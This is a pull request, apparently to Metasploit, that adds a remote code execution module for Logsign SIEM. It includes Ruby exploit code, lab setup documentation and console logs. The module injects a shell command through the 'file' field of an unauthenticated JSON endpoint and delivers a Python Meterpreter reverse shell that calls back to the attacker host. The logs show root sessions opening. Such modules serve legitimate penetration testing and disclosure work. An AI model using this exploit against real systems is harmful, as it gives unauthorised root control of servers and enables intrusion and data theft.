### PR TITLE
Add Module Logsign Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/linux/http/logsign_exec.md
+++ b/documentation/modules/exploit/linux/http/logsign_exec.md
@@ -2,6 +2,8 @@
 
 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.
 
+[http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
+
 ### Creating A Testing Environment
 
 1. Open OVA file with your preferred virtualisation application.
@@ -59,7 +61,7 @@ dns-nameservers 8.8.8.8
   8. `check` and validate that you are seeing following output.
 
 ```
-[*] 12.0.0.10:80 The target appears to be vulnerable.
+[+] 12.0.0.10:80 The target is vulnerable.
 ```
 
   9. Here you go. Type `exploit` and hit the enter.

--- a/documentation/modules/exploit/linux/http/logsign_exec.md
+++ b/documentation/modules/exploit/linux/http/logsign_exec.md
@@ -1,0 +1,76 @@
+## Vulnerable Application
+
+Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.
+
+### Creating A Testing Environment
+
+1. Open OVA file with your preferred virtualisation application.
+2. Before starting the virtual machine, choose NAT mode for interface.
+3. Once the machine started, you must be seeing following information on screen.
+```
+Ubuntu 12.04.05 LTS - logsign customer tty1
+IP: 12.0.0.10
+...
+Version: Focus
+4.4.2 
+```
+4. Access the management interface by visiting `https://<ip_address>` through your browser.
+5. Complete the installation by just submitting the fake data. 
+
+**Please follow below instructions if you are seeing different IP address on the screen that doesn't belong to your NAT network range.**
+
+Right after step 3, I've started to see totally different IP address on the screen which was something like 10.0.0.X. Since there is no such a network range in my configuration, it's impossible access to the machine through network. Here is the steps that shows how you can fix this issue. Follow these instructions and then go back to the step 5.
+
+1. Reboot the machine
+2. Start pressing ```shift``` button at the very beginning and keep pressing until you see GRUB menu.
+3. Choose second line and press enter. We are going to about boot machine with recovery mode.
+4. You must be seeing terminal right now. Execute following commands.
+```
+mount -rw -o remount /
+```
+5. Execute following command specify a new password for root user.
+ ```
+ passwd root
+ ```
+6. As a final step, reboot the machine.
+ ```
+reboot
+ ```
+7. Login with your root user.
+8. Open ```/etc/network/interfaces``` file and perform necessary changes. Here is my own configuration. 
+```
+address 12.0.0.10
+netmask 255.255.255.0
+<removed line starting with 'network'>
+<removed line starting with 'broadcast'>
+gateway 12.0.0.2
+dns-nameservers 8.8.8.8
+```
+9. Reboot the machine for a last time.
+
+## Verification Steps
+
+  1. Install the software as documented above
+  2. Start `msfconsole`
+  3. `use exploit/linux/http/logsign_exec`
+  4. `set rhost 12.0.0.10
+  6. `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
+  7. `set LHOST 12.0.0.1`
+  8. `check` and validate that you are seeing following output.
+
+```
+[*] 12.0.0.10:80 The target appears to be vulnerable.
+```
+
+  9. Here you go. Type `exploit` and hit the enter.
+
+```
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Delivering payload...
+[*] Sending stage (38651 bytes) to 12.0.0.10
+[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.10:46057) at 2017-02-28 14:11:20 +0100
+
+meterpreter > getuid
+Server username: root
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/logsign_exec.md
+++ b/documentation/modules/exploit/linux/http/logsign_exec.md
@@ -3,6 +3,7 @@
 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.
 
 [http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
+[http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso](http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso)
 
 ### Creating A Testing Environment
 

--- a/modules/exploits/linux/http/logsign_exec.rb
+++ b/modules/exploits/linux/http/logsign_exec.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Logsign Remote Command Injection',
+      'Description'    => %q{
+        This module exploits an command injection vulnerability in Logsign.
+        By exploiting this vulnerability, unauthenticated users can execute
+        arbitrary code under the root user.
+
+        Logsign has a publicly accessible endpoint. That endpoint takes a user
+        input and then use it during operating system command execution without
+        proper validation.
+
+        This module was tested against 4.4.2 and 4.4.137 versions.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>'  # author & msf module
+        ],
+      'References'      =>
+        [
+          ['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/']
+        ],
+      'Privileged'      => true,
+      'Platform'        => ['python'],
+      'Arch'            => ARCH_PYTHON,
+      'DefaultOptions'  =>
+        {
+          'payload' => 'python/meterpreter/reverse_tcp'
+        },
+      'Targets'         => [ ['Automatic', {}] ],
+      'DisclosureDate'  => 'Feb 26 2017',
+      'DefaultTarget'   => 0
+    ))
+
+  end
+
+  def check
+    p_hash = {:file => "#{rand_text_alpha(15 + rand(4))}.raw"}
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
+      'ctype' => 'application/json',
+      'data' => JSON.generate(p_hash)
+    )
+
+    if res && res.body.include?('{"message": "success", "success": true}')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Delivering payload...")
+
+    p_hash = {:file => "logsign.raw\" quit 2>&1 |python -c \"#{payload.encoded}\" #"}
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
+      'ctype' => 'application/json',
+      'data' => JSON.generate(p_hash)
+    )
+  end
+end

--- a/modules/exploits/linux/http/logsign_exec.rb
+++ b/modules/exploits/linux/http/logsign_exec.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.body.include?('{"message": "success", "success": true}')
-      Exploit::CheckCode::Appears
+      Exploit::CheckCode::Vulnerable
     else
       Exploit::CheckCode::Safe
     end


### PR DESCRIPTION
This module exploits an command injection vulnerability in Logsign. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the root user.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/logsign_exec`
- [x] `set RHOST 12.0.0.10`
- [x] `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type. `set LHOST 12.0.0.1`
- [x] `check` and validate that you are seeing `[+] 12.0.0.10:80 The target is vulnerable.`
- [x] `exploit` and then **verify** the `Meterpreter session 1 opened at console.`

Console output:

```
msf > use exploit/linux/http/logsign_exec 
msf exploit(logsign_exec) > set RHOST 12.0.0.10
RHOST => 12.0.0.10
msf exploit(logsign_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(logsign_exec) > check
[+] 12.0.0.10:80 The target is vulnerable.
msf exploit(logsign_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.10
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.10:46660) at 2017-03-10 13:05:16 +0300

meterpreter > getuid
Server username: root
meterpreter > 
```